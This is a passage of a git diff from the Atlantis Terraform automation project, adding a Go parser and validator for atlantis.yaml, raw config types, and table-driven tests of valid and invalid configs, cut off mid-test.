+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]string, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(string)
+ }
+ }
+ return
+}
diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go
new file mode 100644
index 0000000000..c8ad9ca096
--- /dev/null
+++ b/server/events/yaml/parser_validator.go
@@ -0,0 +1,146 @@
+package yaml
+
+import (
+ "fmt"
+ "io/ioutil"
+ "os"
+ "path/filepath"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "gopkg.in/yaml.v2"
+)
+
+// AtlantisYAMLFilename is the name of the config file for each repo.
+const AtlantisYAMLFilename = "atlantis.yaml"
+
+type ParserValidator struct{}
+
+// ReadConfig returns the parsed and validated atlantis.yaml config for repoDir.
+// If there is no config file, the returned error satisfies os.IsNotExist(err),
+// but callers should prefer HasConfigFile to check for existence.
+func (p *ParserValidator) ReadConfig(repoDir string) (valid.Config, error) {
+ configFile := p.configFilePath(repoDir)
+ configData, err := ioutil.ReadFile(configFile)
+
+ // NOTE: the error we return here must also be os.IsNotExist since that's
+ // what our callers use to detect a missing config file.
+ if err != nil && os.IsNotExist(err) {
+ return valid.Config{}, err
+ }
+
+ // If it exists but we couldn't read it return an error.
+ if err != nil {
+ return valid.Config{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename)
+ }
+
+ // If the config file exists, parse it.
+ config, err := p.parseAndValidate(configData)
+ if err != nil {
+ return valid.Config{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
+ }
+ return config, err
+}
+
+func (p *ParserValidator) HasConfigFile(repoDir string) (bool, error) {
+ _, err := os.Stat(p.configFilePath(repoDir))
+ if os.IsNotExist(err) {
+ return false, nil
+ }
+ if err == nil {
+ return true, nil
+ }
+ return false, err
+}
+
+func (p *ParserValidator) configFilePath(repoDir string) string {
+ return filepath.Join(repoDir, AtlantisYAMLFilename)
+}
+
+func (p *ParserValidator) parseAndValidate(configData []byte) (valid.Config, error) {
+ var rawConfig raw.Config
+ if err := yaml.UnmarshalStrict(configData, &rawConfig); err != nil {
+ return valid.Config{}, err
+ }
+
+ // Set ErrorTag to yaml so it uses the YAML field names in error messages.
+ validation.ErrorTag = "yaml"
+
+ if err := rawConfig.Validate(); err != nil {
+ return valid.Config{}, err
+ }
+
+ // Top level validation.
+ if err := p.validateWorkflows(rawConfig); err != nil {
+ return valid.Config{}, err
+ }
+
+ validConfig := rawConfig.ToValid()
+ if err := p.validateProjectNames(validConfig); err != nil {
+ return valid.Config{}, err
+ }
+
+ return validConfig, nil
+}
+
+func (p *ParserValidator) validateProjectNames(config valid.Config) error {
+ // First, validate that all names are unique.
+ seen := make(map[string]bool)
+ for _, project := range config.Projects {
+ if project.Name != nil {
+ name := *project.Name
+ exists := seen[name]
+ if exists {
+ return fmt.Errorf("found two or more projects with name %q; project names must be unique", name)
+ }
+ seen[name] = true
+ }
+ }
+
+ // Next, validate that if multiple projects share a dir/workspace, they are all named.
+ // This map's keys will be 'dir/workspace' and the values are the names for
+ // that project.
+ dirWorkspaceToNames := make(map[string][]string)
+ for _, project := range config.Projects {
+ key := fmt.Sprintf("%s/%s", project.Dir, project.Workspace)
+ names := dirWorkspaceToNames[key]
+
+ // If there is already a project with this dir/workspace then this
+ // project must have a name.
+ if len(names) > 0 && project.Name == nil {
+ return fmt.Errorf("there are two or more projects with dir: %q workspace: %q that are not all named; they must have a 'name' key so they can be targeted for apply's separately", project.Dir, project.Workspace)
+ }
+ var name string
+ if project.Name != nil {
+ name = *project.Name
+ }
+ dirWorkspaceToNames[key] = append(dirWorkspaceToNames[key], name)
+ }
+
+ return nil
+}
+
+func (p *ParserValidator) validateWorkflows(config raw.Config) error {
+ for _, project := range config.Projects {
+ if err := p.validateWorkflowExists(project, config.Workflows); err != nil {
+ return err
+ }
+ }
+ return nil
+}
+
+func (p *ParserValidator) validateWorkflowExists(project raw.Project, workflows map[string]raw.Workflow) error {
+ if project.Workflow == nil {
+ return nil
+ }
+ workflow := *project.Workflow
+ for k := range workflows {
+ if k == workflow {
+ return nil
+ }
+ }
+ return fmt.Errorf("workflow %q is not defined", workflow)
+}
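
A usage sketch of ParserValidator showing the intended error handling: a missing file surfaces as os.IsNotExist, while anything else is a real read/parse/validation failure (the repo path is illustrative):

package main

import (
	"fmt"
	"os"

	"github.com/runatlantis/atlantis/server/events/yaml"
)

func main() {
	p := &yaml.ParserValidator{}
	cfg, err := p.ReadConfig("/path/to/cloned/repo")
	if os.IsNotExist(err) {
		fmt.Println("no atlantis.yaml; falling back to defaults")
		return
	}
	if err != nil {
		fmt.Println("invalid config:", err)
		return
	}
	fmt.Println("version:", cfg.Version, "projects:", len(cfg.Projects))
}
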
diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go
new file mode 100644
index 0000000000..43b5270631
--- /dev/null
+++ b/server/events/yaml/parser_validator_test.go
@@ -0,0 +1,629 @@
+package yaml_test
+
+import (
+ "io/ioutil"
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/yaml"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestReadConfig_DirDoesNotExist(t *testing.T) {
+ r := yaml.ParserValidator{}
+ _, err := r.ReadConfig("/not/exist")
+ Assert(t, os.IsNotExist(err), "exp os.IsNotExist error")
+
+ exists, err := r.HasConfigFile("/not/exist")
+ Ok(t, err)
+ Equals(t, false, exists)
+}
+
+func TestReadConfig_FileDoesNotExist(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ r := yaml.ParserValidator{}
+ _, err := r.ReadConfig(tmpDir)
+ Assert(t, os.IsNotExist(err), "exp os.IsNotExist error")
+
+ exists, err := r.HasConfigFile(tmpDir)
+ Ok(t, err)
+ Equals(t, false, exists)
+}
+
+func TestReadConfig_BadPermissions(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000)
+ Ok(t, err)
+
+ r := yaml.ParserValidator{}
+ _, err = r.ReadConfig(tmpDir)
+ ErrContains(t, "unable to read atlantis.yaml file: ", err)
+}
+
+func TestReadConfig_UnmarshalErrors(t *testing.T) {
+ // We only have a few cases here because we assume the YAML library to be
+ // well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810.
+ cases := []struct {
+ description string
+ input string
+ expErr string
+ }{
+ {
+ "random characters",
+ "slkjds",
+ "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into raw.Config",
+ },
+ {
+ "just a colon",
+ ":",
+ "parsing atlantis.yaml: yaml: did not find expected key",
+ },
+ }
+
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+ Ok(t, err)
+ r := yaml.ParserValidator{}
+ _, err = r.ReadConfig(tmpDir)
+ ErrEquals(t, c.expErr, err)
+ })
+ }
+}
+
+func TestReadConfig(t *testing.T) {
+ tfVersion, _ := version.NewVersion("v0.11.0")
+ cases := []struct {
+ description string
+ input string
+ expErr string
+ exp valid.Config
+ }{
+ // Version key.
+ {
+ description: "no version",
+ input: `
+projects:
+- dir: "."
+`,
+ expErr: "version: is required. If you've just upgraded Atlantis you need to rewrite your atlantis.yaml for version 2. See www.runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.html.",
+ },
+ {
+ description: "unsupported version",
+ input: `
+version: 0
+projects:
+- dir: "."
+`,
+ expErr: "version: must equal 2.",
+ },
+ {
+ description: "empty version",
+ input: `
+version: ~
+projects:
+- dir: "."
+`,
+ expErr: "version: must equal 2.",
+ },
+
+ // Projects key.
+ {
+ description: "empty projects list",
+ input: `
+version: 2
+projects:`,
+ exp: valid.Config{
+ Version: 2,
+ Projects: nil,
+ Workflows: map[string]valid.Workflow{},
+ },
+ },
+ {
+ description: "project dir not set",
+ input: `
+version: 2
+projects:
+- `,
+ expErr: "projects: (0: (dir: cannot be blank.).).",
+ },
+ {
+ description: "project dir set",
+ input: `
+version: 2
+projects:
+- dir: .`,
+ exp: valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Workspace: "default",
+ Workflow: nil,
+ TerraformVersion: nil,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ ApplyRequirements: nil,
+ },
+ },
+ Workflows: map[string]valid.Workflow{},
+ },
+ },
+ {
+ description: "project fields set except autoplan",
+ input: `
+version: 2
+projects:
+- dir: .
+ workspace: myworkspace
+ terraform_version: v0.11.0
+ apply_requirements: [approved]
+ workflow: myworkflow
+workflows:
+ myworkflow: ~`,
+ exp: valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Workspace: "myworkspace",
+ Workflow: String("myworkflow"),
+ TerraformVersion: tfVersion,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ ApplyRequirements: []string{"approved"},
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {},
+ },
+ },
+ },
+ {
+ description: "project field with autoplan",
+ input: `
+version: 2
+projects:
+- dir: .
+ workspace: myworkspace
+ terraform_version: v0.11.0
+ apply_requirements: [approved]
+ workflow: myworkflow
+ autoplan:
+ enabled: false
+workflows:
+ myworkflow: ~`,
+ exp: valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ Workspace: "myworkspace",
+ Workflow: String("myworkflow"),
+ TerraformVersion: tfVersion,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: false,
+ },
+ ApplyRequirements: []string{"approved"},
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {},
+ },
+ },
+ },
+ {
+ description: "project dir with ..",
+ input: `
+version: 2
+projects:
+- dir: ..`,
+ expErr: "projects: (0: (dir: cannot contain '..'.).).",
+ },
+
+ // Project must have dir set.
+ {
+ description: "project with no config",
+ input: `
+version: 2
+projects:
+-`,
+ expErr: "projects: (0: (dir: cannot be blank.).).",
+ },
+ {
+ description: "project with no config at index 1",
+ input: `
+version: 2
+projects:
+- dir: "."
+-`,
+ expErr: "projects: (1: (dir: cannot be blank.).).",
+ },
+ {
+ description: "project with unknown key",
+ input: `
+version: 2
+projects:
+- unknown: value`,
+ expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct raw.Project",
+ },
+ {
+ description: "referencing workflow that doesn't exist",
+ input: `
+version: 2
+projects:
+- dir: .
+ workflow: undefined`,
+ expErr: "workflow \"undefined\" is not defined",
+ },
+ {
+ description: "two projects with same dir/workspace without names",
+ input: `
+version: 2
+projects:
+- dir: .
+ workspace: workspace
+- dir: .
+ workspace: workspace`,
+ expErr: "there are two or more projects with dir: \".\" workspace: \"workspace\" that are not all named; they must have a 'name' key so they can be targeted for apply's separately",
+ },
+ {
+ description: "two projects with same dir/workspace only one with name",
+ input: `
+version: 2
+projects:
+- name: myname
+ dir: .
+ workspace: workspace
+- dir: .
+ workspace: workspace`,
+ expErr: "there are two or more projects with dir: \".\" workspace: \"workspace\" that are not all named; they must have a 'name' key so they can be targeted for apply's separately",
+ },
+ {
+ description: "two projects with same dir/workspace both with same name",
+ input: `
+version: 2
+projects:
+- name: myname
+ dir: .
+ workspace: workspace
+- name: myname
+ dir: .
+ workspace: workspace`,
+ expErr: "found two or more projects with name \"myname\"; project names must be unique",
+ },
+ {
+ description: "two projects with same dir/workspace with different names",
+ input: `
+version: 2
+projects:
+- name: myname
+ dir: .
+ workspace: workspace
+- name: myname2
+ dir: .
+ workspace: workspace`,
+ exp: valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Name: String("myname"),
+ Dir: ".",
+ Workspace: "workspace",
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ },
+ {
+ Name: String("myname2"),
+ Dir: ".",
+ Workspace: "workspace",
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ },
+ },
+ Workflows: map[string]valid.Workflow{},
+ },
+ },
+ }
+
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+ Ok(t, err)
+
+ r := yaml.ParserValidator{}
+ act, err := r.ReadConfig(tmpDir)
+ if c.expErr != "" {
+ ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err)
+ return
+ }
+ Ok(t, err)
+ Equals(t, c.exp, act)
+ })
+ }
+}
+
+func TestReadConfig_Successes(t *testing.T) {
+ basicProjects := []valid.Project{
+ {
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ Workspace: "default",
+ ApplyRequirements: nil,
+ Dir: ".",
+ },
+ }
+
+ cases := []struct {
+ description string
+ input string
+ expOutput valid.Config
+ }{
+ {
+ description: "uses project defaults",
+ input: `
+version: 2
+projects:
+- dir: "."`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: make(map[string]valid.Workflow),
+ },
+ },
+ {
+ description: "autoplan is enabled by default",
+ input: `
+version: 2
+projects:
+- dir: "."
+ autoplan:
+ when_modified: ["**/*.tf"]
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: make(map[string]valid.Workflow),
+ },
+ },
+ {
+ description: "if workflows not defined there are none",
+ input: `
+version: 2
+projects:
+- dir: "."
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: make(map[string]valid.Workflow),
+ },
+ },
+ {
+ description: "if workflows key set but with no workflows there are none",
+ input: `
+version: 2
+projects:
+- dir: "."
+workflows: ~
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: make(map[string]valid.Workflow),
+ },
+ },
+ {
+ description: "if a plan or apply explicitly defines an empty steps key then there are no steps",
+ input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+ default:
+ plan:
+ steps:
+ apply:
+ steps:
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: map[string]valid.Workflow{
+ "default": {
+ Plan: &valid.Stage{
+ Steps: nil,
+ },
+ Apply: &valid.Stage{
+ Steps: nil,
+ },
+ },
+ },
+ },
+ },
+ {
+ description: "if steps are set then we parse them properly",
+ input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+ default:
+ plan:
+ steps:
+ - init
+ - plan
+ apply:
+ steps:
+ - plan # we don't validate if they make sense
+ - apply
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: map[string]valid.Workflow{
+ "default": {
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ {
+ StepName: "plan",
+ },
+ },
+ },
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "plan",
+ },
+ {
+ StepName: "apply",
+ },
+ },
+ },
+ },
+ },
+ },
+ },
+ {
+ description: "we parse extra_args for the steps",
+ input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+ default:
+ plan:
+ steps:
+ - init:
+ extra_args: []
+ - plan:
+ extra_args:
+ - arg1
+ - arg2
+ apply:
+ steps:
+ - plan:
+ extra_args: [a, b]
+ - apply:
+ extra_args: ["a", "b"]
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: map[string]valid.Workflow{
+ "default": {
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ ExtraArgs: []string{},
+ },
+ {
+ StepName: "plan",
+ ExtraArgs: []string{"arg1", "arg2"},
+ },
+ },
+ },
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "plan",
+ ExtraArgs: []string{"a", "b"},
+ },
+ {
+ StepName: "apply",
+ ExtraArgs: []string{"a", "b"},
+ },
+ },
+ },
+ },
+ },
+ },
+ },
+ {
+ description: "custom steps are parsed",
+ input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+ default:
+ plan:
+ steps:
+ - run: "echo \"plan hi\""
+ apply:
+ steps:
+ - run: echo apply "arg 2"
+`,
+ expOutput: valid.Config{
+ Version: 2,
+ Projects: basicProjects,
+ Workflows: map[string]valid.Workflow{
+ "default": {
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "run",
+ RunCommand: []string{"echo", "plan hi"},
+ },
+ },
+ },
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "run",
+ RunCommand: []string{"echo", "apply", "arg 2"},
+ },
+ },
+ },
+ },
+ },
+ },
+ },
+ }
+
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+ Ok(t, err)
+
+ r := yaml.ParserValidator{}
+ act, err := r.ReadConfig(tmpDir)
+ Ok(t, err)
+ Equals(t, c.expOutput, act)
+ })
+ }
+}
+
+// String is a helper routine that allocates a new string value
+// to store v and returns a pointer to it.
+func String(v string) *string { return &v }
diff --git a/server/events/yaml/raw/autoplan.go b/server/events/yaml/raw/autoplan.go
new file mode 100644
index 0000000000..00222d1631
--- /dev/null
+++ b/server/events/yaml/raw/autoplan.go
@@ -0,0 +1,39 @@
+package raw
+
+import "github.com/runatlantis/atlantis/server/events/yaml/valid"
+
+const DefaultAutoPlanWhenModified = "**/*.tf"
+const DefaultAutoPlanEnabled = true
+
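+// Autoplan is the raw YAML representation of a project's autoplan config.
+// Fields are nil-able so we can tell the difference between a key that was
+// explicitly set and one that was omitted, ex. 'enabled: false' vs. no
+// 'enabled' key at all (which defaults to true in ToValid).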
+type Autoplan struct {
+ WhenModified []string `yaml:"when_modified,omitempty"`
+ Enabled *bool `yaml:"enabled,omitempty"`
+}
+
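+// ToValid returns the validated autoplan config, filling in defaults for any
+// fields that were left unset.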
+func (a Autoplan) ToValid() valid.Autoplan {
+ var v valid.Autoplan
+ if a.WhenModified == nil {
+ v.WhenModified = []string{DefaultAutoPlanWhenModified}
+ } else {
+ v.WhenModified = a.WhenModified
+ }
+
+ if a.Enabled == nil {
+		v.Enabled = DefaultAutoPlanEnabled
+ } else {
+ v.Enabled = *a.Enabled
+ }
+
+ return v
+}
+
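+// Validate is a no-op: any combination of autoplan fields is legal.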
+func (a Autoplan) Validate() error {
+ return nil
+}
+
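+// DefaultAutoPlan returns the autoplan config used when the key is omitted
+// entirely.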
+func DefaultAutoPlan() valid.Autoplan {
+ return valid.Autoplan{
+ WhenModified: []string{DefaultAutoPlanWhenModified},
+ Enabled: DefaultAutoPlanEnabled,
+ }
+}
diff --git a/server/events/yaml/raw/autoplan_test.go b/server/events/yaml/raw/autoplan_test.go
new file mode 100644
index 0000000000..43b85a0143
--- /dev/null
+++ b/server/events/yaml/raw/autoplan_test.go
@@ -0,0 +1,151 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestAutoplan_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Autoplan
+ }{
+ {
+ description: "omit unset fields",
+ input: "",
+ exp: raw.Autoplan{
+ Enabled: nil,
+ WhenModified: nil,
+ },
+ },
+ {
+ description: "all fields set",
+ input: `
+enabled: true
+when_modified: ["something-else"]
+`,
+ exp: raw.Autoplan{
+ Enabled: Bool(true),
+ WhenModified: []string{"something-else"},
+ },
+ },
+ {
+ description: "enabled false",
+ input: `
+enabled: false
+when_modified: ["something-else"]
+`,
+ exp: raw.Autoplan{
+ Enabled: Bool(false),
+ WhenModified: []string{"something-else"},
+ },
+ },
+ {
+ description: "modified elem empty",
+ input: `
+enabled: false
+when_modified:
+-
+`,
+ exp: raw.Autoplan{
+ Enabled: Bool(false),
+ WhenModified: []string{""},
+ },
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var a raw.Autoplan
+ err := yaml.UnmarshalStrict([]byte(c.input), &a)
+ Ok(t, err)
+ Equals(t, c.exp, a)
+ })
+ }
+}
+
+func TestAutoplan_Validate(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Autoplan
+ }{
+ {
+ description: "nothing set",
+ input: raw.Autoplan{},
+ },
+ {
+ description: "when_modified empty",
+ input: raw.Autoplan{
+ WhenModified: []string{},
+ },
+ },
+ {
+ description: "enabled false",
+ input: raw.Autoplan{
+ Enabled: Bool(false),
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Ok(t, c.input.Validate())
+ })
+ }
+}
+
+func TestAutoplan_ToValid(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Autoplan
+ exp valid.Autoplan
+ }{
+ {
+ description: "nothing set",
+ input: raw.Autoplan{},
+ exp: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ {
+ description: "when modified empty",
+ input: raw.Autoplan{
+ WhenModified: []string{},
+ },
+ exp: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{},
+ },
+ },
+ {
+ description: "enabled false",
+ input: raw.Autoplan{
+ Enabled: Bool(false),
+ },
+ exp: valid.Autoplan{
+ Enabled: false,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ {
+ description: "enabled true",
+ input: raw.Autoplan{
+ Enabled: Bool(true),
+ },
+ exp: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
diff --git a/server/events/yaml/raw/config.go b/server/events/yaml/raw/config.go
new file mode 100644
index 0000000000..218e02e608
--- /dev/null
+++ b/server/events/yaml/raw/config.go
@@ -0,0 +1,50 @@
+package raw
+
+import (
+ "errors"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+// Config is the representation for the whole config file at the top level.
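+// An example file (illustrative only, mirroring the test cases elsewhere in
+// this package):
+//   version: 2
+//   projects:
+//   - dir: .
+//   workflows:
+//     default:
+//       plan:
+//         steps: [init, plan]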
+type Config struct {
+ Version *int `yaml:"version,omitempty"`
+ Projects []Project `yaml:"projects,omitempty"`
+ Workflows map[string]Workflow `yaml:"workflows,omitempty"`
+}
+
+func (c Config) Validate() error {
+ equals2 := func(value interface{}) error {
+ asIntPtr := value.(*int)
+ if asIntPtr == nil {
+ return errors.New("is required. If you've just upgraded Atlantis you need to rewrite your atlantis.yaml for version 2. See www.runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.html")
+ }
+ if *asIntPtr != 2 {
+ return errors.New("must equal 2")
+ }
+ return nil
+ }
+ return validation.ValidateStruct(&c,
+ validation.Field(&c.Version, validation.By(equals2)),
+ validation.Field(&c.Projects),
+ validation.Field(&c.Workflows),
+ )
+}
+
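+// ToValid returns the validated version of the config. It must only be called
+// after Validate() succeeds because it dereferences Version.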
+func (c Config) ToValid() valid.Config {
+ var validProjects []valid.Project
+ for _, p := range c.Projects {
+ validProjects = append(validProjects, p.ToValid())
+ }
+
+ validWorkflows := make(map[string]valid.Workflow)
+ for k, v := range c.Workflows {
+ validWorkflows[k] = v.ToValid()
+ }
+ return valid.Config{
+ Version: *c.Version,
+ Projects: validProjects,
+ Workflows: validWorkflows,
+ }
+}
diff --git a/server/events/yaml/raw/config_test.go b/server/events/yaml/raw/config_test.go
new file mode 100644
index 0000000000..be5c880629
--- /dev/null
+++ b/server/events/yaml/raw/config_test.go
@@ -0,0 +1,283 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestConfig_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Config
+ expErr string
+ }{
+ {
+ description: "no data",
+ input: "",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ },
+ {
+ description: "yaml nil",
+ input: "~",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ },
+ {
+ description: "invalid key",
+ input: "invalid: key",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ expErr: "yaml: unmarshal errors:\n line 1: field invalid not found in struct raw.Config",
+ },
+ {
+ description: "version set",
+ input: "version: 2",
+ exp: raw.Config{
+ Version: Int(2),
+ Projects: nil,
+ Workflows: nil,
+ },
+ },
+ {
+ description: "projects key without value",
+ input: "projects:",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ },
+ {
+ description: "workflows key without value",
+ input: "workflows:",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ },
+ {
+ description: "projects with a map",
+ input: "projects:\n key: value",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!map into []raw.Project",
+ },
+ {
+ description: "projects with a scalar",
+ input: "projects: value",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ expErr: "yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `value` into []raw.Project",
+ },
+ {
+ description: "should use values if set",
+ input: `
+version: 2
+projects:
+- dir: mydir
+ workspace: myworkspace
+ workflow: default
+ terraform_version: v0.11.0
+ autoplan:
+ enabled: false
+ when_modified: []
+ apply_requirements: [mergeable]
+workflows:
+ default:
+ plan:
+ steps: []
+ apply:
+ steps: []`,
+ exp: raw.Config{
+ Version: Int(2),
+ Projects: []raw.Project{
+ {
+ Dir: String("mydir"),
+ Workspace: String("myworkspace"),
+ Workflow: String("default"),
+ TerraformVersion: String("v0.11.0"),
+ Autoplan: &raw.Autoplan{
+ WhenModified: []string{},
+ Enabled: Bool(false),
+ },
+ ApplyRequirements: []string{"mergeable"},
+ },
+ },
+ Workflows: map[string]raw.Workflow{
+ "default": {
+ Apply: &raw.Stage{
+ Steps: []raw.Step{},
+ },
+ Plan: &raw.Stage{
+ Steps: []raw.Step{},
+ },
+ },
+ },
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var conf raw.Config
+ err := yaml.UnmarshalStrict([]byte(c.input), &conf)
+ if c.expErr != "" {
+ ErrEquals(t, c.expErr, err)
+ return
+ }
+ Ok(t, err)
+ Equals(t, c.exp, conf)
+ })
+ }
+}
+
+func TestConfig_Validate(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Config
+ expErr string
+ }{
+ {
+ description: "version not nil",
+ input: raw.Config{
+ Version: nil,
+ },
+ expErr: "version: is required. If you've just upgraded Atlantis you need to rewrite your atlantis.yaml for version 2. See www.runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.html.",
+ },
+ {
+ description: "version not 1",
+ input: raw.Config{
+ Version: Int(1),
+ },
+ expErr: "version: must equal 2.",
+ },
+ }
+ validation.ErrorTag = "yaml"
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := c.input.Validate()
+ if c.expErr == "" {
+ Ok(t, err)
+ } else {
+ ErrEquals(t, c.expErr, err)
+ }
+ })
+ }
+}
+
+func TestConfig_ToValid(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Config
+ exp valid.Config
+ }{
+ {
+ description: "nothing set",
+ input: raw.Config{Version: Int(2)},
+ exp: valid.Config{
+ Version: 2,
+ Workflows: make(map[string]valid.Workflow),
+ },
+ },
+ {
+ description: "set to empty",
+ input: raw.Config{
+ Version: Int(2),
+ Workflows: map[string]raw.Workflow{},
+ Projects: []raw.Project{},
+ },
+ exp: valid.Config{
+ Version: 2,
+ Workflows: map[string]valid.Workflow{},
+ Projects: nil,
+ },
+ },
+ {
+ description: "everything set",
+ input: raw.Config{
+ Version: Int(2),
+ Workflows: map[string]raw.Workflow{
+ "myworkflow": {
+ Apply: &raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("apply"),
+ },
+ },
+ },
+ Plan: &raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("init"),
+ },
+ },
+ },
+ },
+ },
+ Projects: []raw.Project{
+ {
+ Dir: String("mydir"),
+ },
+ },
+ },
+ exp: valid.Config{
+ Version: 2,
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "apply",
+ },
